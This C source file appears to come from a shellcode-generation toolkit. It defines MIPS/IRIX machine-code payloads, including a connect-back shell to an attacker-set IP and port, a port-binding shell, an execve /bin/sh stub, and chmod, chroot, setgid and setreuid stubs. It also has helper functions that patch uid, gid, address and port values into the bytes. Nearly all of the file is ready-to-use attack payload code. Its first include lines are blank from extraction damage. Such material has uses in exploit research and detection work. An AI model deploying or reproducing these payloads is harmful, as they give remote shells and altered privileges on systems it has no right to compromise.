/*
 * NOTE(review): the first three #include lines lost their header names in
 * extraction (they appear here as bare `#include'); strlen() and memcpy()
 * used at the bottom of this file need <string.h>.
 */
#include
#include
#include
#include "shellcode.h"
#include "mips.h"

/*
 * Table of MIPS/IRIX shellcode byte strings and the helpers that patch
 * their variable fields in place.
 *
 * The positional fields of each `shellcode' entry appear to be: name,
 * length in bytes, code bytes -- confirm against shellcode.h, which is not
 * part of this file.  The `^^' markers in the comments next to the byte
 * strings point at the bytes that the *_setup () functions below overwrite;
 * the byte offsets hard-coded in those functions must stay in sync with the
 * strings.
 */

/* tested on: IP20 R4000 6.5 */
shellcode mips_irix_chmod = {
	"mips-irix-chmod",
	64,
	"\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"	/* ^^ ^^ = uid ^ 0x5555 */
	"\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"	/* ^^ ^^ = gid ^ 0x5555 */
	"\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"	/* ^^ ^^ = length of appended pathname + 0xfeb8 */
	"\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
	"\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
	"\x24\x18\x72\xec",
};

/* tested on: IP20 R4000 6.5 */
shellcode mips_irix_chroot = {
	"mips-irix-chroot",
	84,
	"\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
	"\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
	"\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
	"\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
	"\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
	"\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
	"\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
};

/* tested on: IP20 R4000 6.5 */
shellcode mips_irix_connectsh = {
	"mips-irix-connectsh",
	172,
	"\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
	"\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
	"\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
	"\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"	/* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */
	"\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"	/* ^^ ^^ ip .3.4 */
	"\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
	"\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
	"\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
	"\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
	"\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
	"\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
	"\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
	"\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
	"\x24\x02\x04\x23\x01\x01\x01\x0c"
	"\x2f\x62\x69\x6e\x2f\x73\x68\x42",			/* "/bin/sh\x42" */
};

/* tested on: IP20 R4000 6.5 */
shellcode mips_irix_execvesh = {
	"mips-irix-execvesh",
	48,
	"\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
	"\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
	"\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
	"\x01\x01\x01\x0c"
	"\x2f\x62\x69\x6e\x2f\x73\x68\x42",			/* "/bin/sh\x42" */
};

shellcode mips_irix_exit = {
	"mips-irix-exit",
	16,
	"\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
	"\x24\x18\x73\x50",
};

/* tested on: IP20 R4000 6.5
 *            IP30 R10000 6.5.7m (thanks oxigen ;) */
shellcode mips_irix_portshellsh = {
	"mips-irix-portshellsh",
	188,	/* yay! well optimized */
	"\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
	"\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
	"\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
	"\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4"	/* 0x4141 = port */
	"\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
	"\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
	"\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
	"\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
	"\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
	"\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
	"\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
	"\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
	"\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
	"\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
	"\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
	"\x2f\x62\x69\x6e\x2f\x73\x68\x42",			/* "/bin/sh\x42" */
};

/* tested on: IP20 R4000 6.5 */
shellcode mips_irix_read = {
	"mips-irix-read",
	56,
	"\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
	"\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
	"\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
	"\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
	"\x01\x01\x01\x0c\x24\x18\x73\x50",
};

shellcode mips_irix_setgid = {
	"mips-irix-setgid",
	16,
	"\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16"	/* 0x4141 = gid ^ 0x5555 */
	"\x01\x01\x01\x0c",
};

shellcode mips_irix_setreuid = {
	"mips-irix-setreuid",
	24,
	"\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"	/* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */
	"\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
};

/* NULL-terminated list of every entry above, in table order. */
shellcode * mips_irix_shellcodes[] = {
	&mips_irix_chmod,
	&mips_irix_chroot,
	&mips_irix_connectsh,
	&mips_irix_execvesh,
	&mips_irix_exit,
	&mips_irix_portshellsh,
	&mips_irix_read,
	&mips_irix_setgid,
	&mips_irix_setreuid,
	NULL,
};

/* Architecture record: name, a numeric field (4), the nop sequence from
 * mips.h and the entry list -- field meaning per the `arch' definition
 * in shellcode.h. */
arch mips_irix = {
	"mips-irix",
	4,
	mips_nop,
	mips_irix_shellcodes,
};


/*
 * Store the low 16 bits of `v' big-endian into code[off] and code[off + 1].
 * Every patch below writes a 16-bit field, so this is the only byte-level
 * store in the file.
 */
static void
put_be16 (unsigned char *code, int off, unsigned int v)
{
	code[off] = (v >> 8) & 0xff;
	code[off + 1] = v & 0xff;
}


/*
 * Patch the uid, gid and pathname into a copy of the mips-irix-chmod bytes
 * at `code'.
 *
 * code[6..7]   <- uid ^ 0x5555
 * code[14..15] <- gid ^ 0x5555
 * code[26..27] <- 0xfeb8 + strlen (pathname), kept as an unsigned short,
 *                 so only the low 16 bits of the sum are encoded
 * code[64..]   <- the pathname bytes, no terminating NUL
 *
 * There is no capacity argument: the pathname is appended directly after
 * the 64-byte stub, so the caller must have strlen (pathname) bytes of
 * writable space left after `code' (the original XXX note).
 */
void
mips_irix_chmod_setup (unsigned char *code, char *pathname,
		       unsigned short int uid, unsigned short int gid)
{
	unsigned short int imm = 0xfeb8;

	put_be16 (code, 6, uid ^ 0x5555);
	put_be16 (code, 14, gid ^ 0x5555);

	/* size_t -> unsigned short: deliberate 16-bit immediate */
	imm += strlen (pathname);
	put_be16 (code, 26, imm);

	memcpy (code + 64, pathname, strlen (pathname));
}


/*
 * Patch the destination port and address into a copy of the
 * mips-irix-connectsh bytes at `code'.  Both are expected in network byte
 * order by the original comment; only the low 32 bits of `ip' are used.
 *
 * code[38..39] <- port
 * code[46..47] <- ip bytes 1-2
 * code[50..51] <- ip bytes 3-4
 */
void
mips_irix_connectsh_setup (unsigned char *code, unsigned long int ip,
			   unsigned short int port)
{
	put_be16 (code, 38, port);
	put_be16 (code, 46, (ip >> 16) & 0xffff);
	put_be16 (code, 50, ip & 0xffff);
}


/* Patch the gid (xor 0x5555) into code[2..3] of the mips-irix-setgid bytes. */
void
mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
{
	put_be16 (code, 2, gid ^ 0x5555);
}


/*
 * Patch ruid and euid (each xor 0x5555) into code[2..3] and code[6..7] of
 * the mips-irix-setreuid bytes.
 */
void
mips_irix_setreuid_setup (unsigned char *code, unsigned short int ruid,
			  unsigned short int euid)
{
	put_be16 (code, 2, ruid ^ 0x5555);
	put_be16 (code, 6, euid ^ 0x5555);
}